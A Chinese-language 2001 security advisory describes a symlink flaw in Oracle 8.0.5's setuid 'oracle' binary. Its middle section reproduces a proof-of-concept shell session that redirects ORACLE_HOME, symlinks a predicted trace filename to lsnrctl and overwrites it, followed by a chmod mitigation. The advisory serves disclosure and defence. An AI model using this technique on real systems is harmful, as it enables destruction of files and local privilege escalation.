oracle 8.0.5 符号链接漏洞
发布日期:2001-08-02
更新日期:2001-08-03
受影响系统:
Oracle 8.0.5
描述:
Oracle 8.0.5所带的'oracle'程序缺省设置了setuid oracle属性。由于这个程序会在
环境变量'ORACLE_HOME'指定的目录下创建一个临时文件,其文件名是可以预测的。
而在创建临时文件时又没有检查文件是否存在或链接,导致本地攻击者可以覆盖任意
'oracle'用户拥有的文件。
攻击者可以造成拒绝服务攻击或者权限提升。
<*来源:Juan Manuel Pascual (
pask@plazasite.com) *>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Juan Manuel Pascual (
pask@plazasite.com)提供了如下测试代码:
[pask@proves1 /tmp]$
[pask@proves1 /tmp]$ mkdir rdbms
[pask@proves1 /tmp]$ cd rdbms/
[pask@proves1 rdbms]$ mkdir log
[pask@proves1 rdbms]$ cd log
[pask@proves1 log]$
[pask@proves1 log]$ ls -alc
total 8
drwxrwxr-x 2 pask pask 4096 dic 14 02:33 .
drwxrwxr-x 3 pask pask 4096 dic 14 02:33 ..
[pask@proves1 log]$ export ORACLE_HOME=/tmp
[pask@proves1 log]$ export REAL_ORACLE_HOME=/usr/local/oracle/app/oracle/product/8.0.5
[pask@proves1 log]$ $REAL_ORACLE_HOME/bin/oracle
[pask@proves1 log]$ ls -alc
total 12
drwxrwxr-x 2 pask pask 4096 dic 14 02:35 .
drwxrwxr-x 3 pask pask 4096 dic 14 02:33 ..
-rw-r----- 1 oracle pask 47 dic 14 02:35 ora_24028.trc
[pask@proves1 log]$ ln -s $REAL_ORACLE_HOME/bin/lsnrctl ./ora_24050.trc
pask@proves1 log]$ $REAL_ORACLE_HOME/bin/oracle
pask@proves1 log]$ $REAL_ORACLE_HOME/bin/oracle
pask@proves1 log]$ $REAL_ORACLE_HOME/bin/oracle
pask@proves1 log]$ $REAL_ORACLE_HOME/bin/oracle
..
...
....
这可能导致$REAL_ORACLE_HOME/bin/lsnrctl文件被覆盖
建议:
临时解决方法:
去掉oracle的suid属性:
# chmod a-s oracle
厂商补丁:
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商
的主页以获取最新版本:
http://www.oracle.com/
浏览次数:3533
严重程度:0(网友投票)
